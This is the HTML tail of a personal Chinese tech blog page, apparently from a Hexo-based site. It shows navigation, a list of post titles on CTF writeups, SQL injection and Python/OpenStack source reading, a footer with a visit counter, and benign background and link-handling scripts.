    <script> loadComment(); </script>

    <div id="uyan_frame"></div>
</section>
    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2017/12/04/problem&solution/" title="上一篇: problem&amp;solution">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2017/11/09/一道anti sql/" title="下一篇: 从一道anti sql题讲起">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/11/21/Openstack之keystone源代码简读一/">Openstack之keystone源代码简读一</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/11/21/Openstack之keystone源代码简读二/">Openstack之keystone源代码简读二</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/22/Openstack之Glance源代码简读一/">Openstack之Glance源代码简读一</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/16/hadoop/">hadoop(笔记)</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/03/29/无题-二/">无题(二)</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/02/01/scrapy-浅分析-四/">scrapy 浅分析(四)</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/02/01/scrapy-浅分析-三/">scrapy 浅分析(三)</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/31/scrapy-浅分析-二/">scrapy 浅分析(二)</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/30/scrapy-浅分析-一/">scrapy 浅分析(一)</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/22/flask-v0-1源码简单分析/">flask v0.1源码简单分析</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/17/无题-一/">无题（一）</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/12/19/php的session反序列化/">php的session反序列化</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/12/07/parse-url/">parse_url</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/12/04/problem&solution/">problem&solution</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/14/iamsowly/">solveme.kr-iamsowly</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/09/一道anti sql/">从一道anti sql题讲起</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/08/the-in-ubuntu/">the “*” in ubuntu</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/07/sniperoj-web-writeup/">sniperoj some web writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/26/几道sqli/">几道sql</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/22/url中的下划线/">url中的下划线</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/09/20/php两道题/">php两道题</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/09/19/某年某月的某一天/">某年某月的某一天</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/09/17/小游戏 7 8 /">小游戏-7,8</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/09/08/小游戏 5，6/">小游戏5,6</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/09/01/小游戏 1 2 3 4/">小游戏1,2,3,4</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/29/结束&开始/">一段结束</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/29/Python 网易云签到/">python-网易云音乐签到，词云</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/26/实验吧 ctf 编程题(六)/">实验吧 CTF 编程题 （六）</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/24/实验吧 ctf 编程题(五)/">实验吧 CTF 编程题（五）</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/24/实验吧 ctf 编程题(四)/">实验吧 CTF 编程题（四）</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/23/实验吧 ctf 编程题(三)/">实验吧 CTF 编程题（三）</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/23/实验吧 ctf 编程题(二)/">实验吧 CTF 编程题（二）</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/23/实验吧 ctf 编程题(一)/">实验吧 CTF 编程题 （一）</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/22/Python-Django-别人轮子修改/">python Django别人的轮子修改</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/07/16/python-12306-查票/">python-12306-查票</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2017-2019 myndtt
            </div>
            <div class="footer-right">
                <a href="#" target="_blank" >没有你的天堂...</a> <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="本站到访数"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit"  title="本页阅读量"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 5;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>